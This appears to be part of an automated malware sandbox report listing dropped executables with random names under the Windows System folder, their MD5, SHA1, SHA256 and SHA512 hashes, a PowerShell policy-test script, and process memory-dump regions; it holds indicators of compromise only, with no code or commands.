SHA512 408e94a95737ca55dd089168f9ffb5fa9dd01e7174a4e22a52805e966e64771af7ed37cd541d3008266c16bde41b0f9d22ecb94edc7b7f56f417062031d6d66a

C:\Windows\System\BOkFzyq.exe

MD5 2680ea0f7fc65197b239dcbb227f588f
SHA1 7818bcb4cdeee849ad9c1a9fe3b300b4c7e090bb
SHA256 530111ddfcca05f34f317158980065216116a77a9a507512cc7a33a90736e7c9
SHA512 59edc787df468ebb8b766dc8722dd7204691e24df140df0a25e9dd7639d8d0909c812ee390d866bfed53c54038572f7499d5c861099b1c4960fd84cf70521614

C:\Windows\System\eyLWvnO.exe

MD5 3ec5650156454e69a5d506b5a96b3036
SHA1 69b2cdaa823bbf6eaf848a85d80afdfaa21fa829
SHA256 367702c95ad1e4ad6a97b478c431e54cca1614dbb0c8fb9cfb1f5b48b89c90bc
SHA512 6a07eb6b77774ea59ae00f50c00c0af75bd9a4bb5e12c3add912f9da6e4749b82ba988b5602ab01effd8f83ad5649295b92f167380e1f39522b0558ccb984635

C:\Windows\System\nwqCazX.exe

MD5 1b6dea3e40d6dc24a179c31f53aaf78b
SHA1 2f34f1174b5bc5d37b3ca11b2f395ec1d840533d
SHA256 a9e3b7b0ea7405747934abd2419cafc034fd202801665f3c3ac09887107f74c5
SHA512 c7f6eb127c56159471dec6dc14c1218be08d6f35b9f3c1acc05d590515a7b91af222d81affe974b53db96bae39b2d17cd29c22374908b4c0e897c9b9fac48e54

memory/4708-140-0x00007FF9D9340000-0x00007FF9D9E01000-memory.dmp

C:\Windows\System\EHSYwaK.exe

MD5 3979b040e443eb8d2a9ef4aef2cbc4ab
SHA1 f5992f89b3619071063e6e82b4b3beead18615a4
SHA256 832dd91fccb4c8641813306785a8fecc0e6a4436013a40ba3486e54f2e3884c6
SHA512 6c9dcdd59e922ed2cf681a4942a235f3ad1fa248f8b7c567bc5f4360b32ea50bba7fc633efeceb87f32bf66eabcb880763456a30b7486a680aedb8ff92b5cd83

C:\Windows\System\bsLmRio.exe

MD5 96b05444dcc042996f7a48e156576b7f
SHA1 269ef31554414e33215e7f45cd437143039ac09b
SHA256 0d166bc68cbe95e9b39d43acafe33ee811e6d912df7f95e09941dd0af9f6b309
SHA512 0cfcb9c39e8b66fda6a077c8bcacdbebd5ffdbd01b0df862511e5efd992b80869cccad0dbf80eb3f1098a9458931d4086ba183b27b6519d977bc8bc89d1b3572

C:\Windows\System\VbdFhHk.exe

MD5 5ee0097ce29913fb6dab3c6e2ffe3e8b
SHA1 c6ca0016a0ff2720bba6fe96d5be729119e4fba6
SHA256 078e73b57e39f9ccde597f8356dae17fa57934bb10785df1a9a9226c168b5123
SHA512 2d9e670bfad0dff81eabc63e2374524b3875315aed1e6632ac5c6b3e19d7bcbe4b4d7162de2dabdb8dd1a082538868910e8313d58fdaeb64e3ba1bede026913e

C:\Windows\System\CFrfDZH.exe

MD5 85491600ac9996ed77625000f6243391
SHA1 5f5589f322c6cd3ff5da3bd843a65a71efdf8896
SHA256 d358a96633539ac47f7856825efd1adce7ea5350f9df7e33f605f88c20b20b50
SHA512 b1a66df700e711d0f6294b31792e0100db0fe0a97dc22e46e740b6a86a64fa2f3b29060fe87247b73af404d53d980039547a444b70f004ba6326981de888c9c2

C:\Windows\System\pEfCnzK.exe

MD5 e8e589c746d78440b56c562f1f580aed
SHA1 a1240df8dee8d640035fa9b98776a0ac4b0761ee
SHA256 ad5c76a416e8ec4a3102faf8309e8ef2ff07ee4545e992c83d54d0426d6c4269
SHA512 468a0f2459da9179ceb41c0b972502fd514dee760a14b64e501713e579fc7b9fed912939e0086bef0bb1c2f7615fc6d94d9ddcf358f949f774d01062952626af

C:\Windows\System\qyjwxLN.exe

MD5 465ad9a3084cf9a11e9e858c2a67dd18
SHA1 2fcf89cda1fb8ffb5babd391a72d04df7035e9b0
SHA256 18551f1a517a6726ec86b88de61507590eb5546f577b84fc2e3e16d46bcdb4eb
SHA512 8ae9422de007c5b0df3c91d69903f1651f16397881c31143443953d41c1469530e08030f55866907d0a86192be0e97ee067e7e7fff985ef048565d69cfff656a

C:\Windows\System\xZEjcYb.exe

MD5 6d328966004e02eb38d44d4cdf5fda78
SHA1 94117cf35d22dffd4afd95bbf13f876d3efed074
SHA256 2277714187301becb10809da9e3e481a61cec0ebe410d31f9b9e2661748f849e
SHA512 c9e567841fbdbd74754ec8a9d7b70a574816be6c61cf62af6bdeee7a3fc4a119ba29248691eb580130a9a4efa6608ef64e2ac7f833768e15f924c488590e98ab

C:\Windows\System\kFfuBHD.exe

MD5 ef35d7b8e615bc9ad84a2cafd2a4e953
SHA1 d19f1e628c2dd2f2798287bbbd900bfa6af0f868
SHA256 c4bbc27f93d9fc90aea830bded4542729e6295fbecac996566e3e9e5282d57ed
SHA512 2e223046070d1d3d179e532396e5cda935f0c93c374e89d352b57a31658b2c2c810868e4484a2192312038d830252b2c8eeaf9eedc21abe15cf0e3f2184e7b56

C:\Windows\System\NfVsmYE.exe

MD5 89b1f090019b9a7418cd835cdef8832b
SHA1 3a5f9fe77619a2cf1be4b71047d1ac907c9a14f1
SHA256 37f4175ebb3d120019a54a7119f95afaabfd64f0399afedd357229c44978e857
SHA512 3f144515cda8dbd0e9eecc21ac0c32947b19b61759fa9c6bc8209547c7cc86dd02f376b56416803243501bf6cacb2d356b4eec4924ff6687ebf4cd9e83bcc454

C:\Windows\System\bVWjLTA.exe

MD5 e3881f34445c5d662981cfe184a7600e
SHA1 5c8d2806c72ce2b0f39fcb95b3ad04ad96e16a69
SHA256 e22fe977cb3c07f34e999c57baf414a42c6436dccdbe70d8f1a4c974568932b2
SHA512 30d868a31ea91c616014148b7c2337bac112168023df51e2a1eb16774ae8c1c338c261742874ed1f31927ec8cdb7aeb852ba6b3603ef7c7c98380b522557ac39

memory/4708-94-0x000002277BD20000-0x000002277BD42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kmld2msz.1jq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Windows\System\LtzHhPv.exe

MD5 53be029d834816cef4a4b583c48379cf
SHA1 0f71b5efdd51580fadc401dab3347537d557a7ad
SHA256 d5eb55d6551b1ef291be0b2df9c333533e1ffda792ed2ecaab74b3dfb944a7e3
SHA512 94b4a1fa5b05e687431e1c79321421d79e4d449cf2ab7b7831e7c8e3ff70033fa81bed19d8262de5e9b0ff7955089bbf07c0589951f7e1e4c180ddeeb824ce1e

C:\Windows\System\tHrKygf.exe

MD5 820ed28d9279f89ba2a3f892d50932df
SHA1 bea994b6f19abe8b5629e60194e11ae9473c323e
SHA256 6f3423d30ab8b18a4aaeb670fcfae85a8cec646b7a517bb3bd58141e00ac96fa
SHA512 4ed76bba48b80fc46709d1952f2a95c2005ba64a6a9e8813224d1c48870e338f53fb6b0a29cbcb3e2518032d019b14c309307469533c29d1a6612baca2d7681e

memory/1948-56-0x00007FF6ED380000-0x00007FF6ED772000-memory.dmp

memory/4708-50-0x00007FF9D9340000-0x00007FF9D9E01000-memory.dmp

C:\Windows\System\DNSvnae.exe

MD5 e869d33607c32f7a0f970080a38945d0
SHA1 8dfcf9e09a28983a3dea1e429eea75d4349ec679
SHA256 5c2eea52cf5f4e627ebfa3b235f5a578d3f4d64160d2e9418f21599054d46d1e
SHA512 269a566c709c49a42d812bec01974cf49405cb83e679a7c828949beb543d90934247f02853fc10deafba831bd926743dcafd333475f366a4b530ba1a6a67100b

C:\Windows\System\aKqSdGD.exe

MD5 2e258b4be85b144dc6e82accf7f4216d
SHA1 15d416f54d85b30ead3e4c1b66eb487895f46b2e
SHA256 5bf8ef7962fe4b3c9b480199049011551760dab19ce4fc275e89756dddb3d8f8
SHA512 8564c207387dce7d15cd8393e4231ebb4022cdf6aa4f4d6034ca6294b21676381ff628043b098c9e5624bfc0b75db57216e13f09cba063fcbe4d5cb93bbed580

C:\Windows\System\uwkwFEY.exe

MD5 89b7ca5ed1b0c2d1da8eef278b4b89f0
SHA1 5c0be510bbdb7850cbf229a7c6b79ec0b1004945
SHA256 92d7e21ddb888f77f419556fbbb473f52e87b8f4946d965f3b47b3ae4956b0bd
SHA512 2fa76ebd1907d5d9bd107eb38c0c786ff9674a078c99e091b2cce6fa180dc578eb79ec85bad5789b9593b66ecc50cea745c1eb51c95d81fa2a7ac9100a6831eb

memory/860-3607-0x00007FF6ACCC0000-0x00007FF6AD0B2000-memory.dmp

memory/4360-3610-0x00007FF68C760000-0x00007FF68CB52000-memory.dmp

memory/1948-3611-0x00007FF6ED380000-0x00007FF6ED772000-memory.dmp

memory/1040-3613-0x00007FF6A5E80000-0x00007FF6A6272000-memory.dmp

memory/2968-3616-0x00007FF66BF30000-0x00007FF66C322000-memory.dmp

memory/1316-3617-0x00007FF664B90000-0x00007FF664F82000-memory.dmp

memory/1608-3619-0x00007FF7B3700000-0x00007FF7B3AF2000-memory.dmp

memory/1432-3621-0x00007FF69AD30000-0x00007FF69B122000-memory.dmp

memory/4512-3625-0x00007FF6AA520000-0x00007FF6AA912000-memory.dmp

memory/436-3623-0x00007FF67A6C0000-0x00007FF67AAB2000-memory.dmp

memory/4256-3627-0x00007FF7A88D0000-0x00007FF7A8CC2000-memory.dmp

memory/4760-3631-0x00007FF6C7410000-0x00007FF6C7802000-memory.dmp

memory/4964-3629-0x00007FF6BED90000-0x00007FF6BF182000-memory.dmp

memory/4420-3633-0x00007FF7A6B80000-0x00007FF7A6F72000-memory.dmp

memory/4592-3635-0x00007FF77E470000-0x00007FF77E862000-memory.dmp

memory/2356-3637-0x00007FF715BC0000-0x00007FF715FB2000-memory.dmp

memory/4228-3639-0x00007FF787CC0000-0x00007FF7880B2000-memory.dmp

memory/4180-3645-0x00007FF633670000-0x00007FF633A62000-memory.dmp

memory/2336-3643-0x00007FF7750B0000-0x00007FF7754A2000-memory.dmp

memory/1456-3647-0x00007FF795700000-0x00007FF795AF2000-memory.dmp

memory/4704-3649-0x00007FF6C7960000-0x00007FF6C7D52000-memory.dmp

memory/3776-3656-0x00007FF6E8E60000-0x00007FF6E9252000-memory.dmp

memory/2536-3666-0x00007FF7E4400000-0x00007FF7E47F2000-memory.dmp

memory/1044-3660-0x00007FF724720000-0x00007FF724B12000-memory.dmp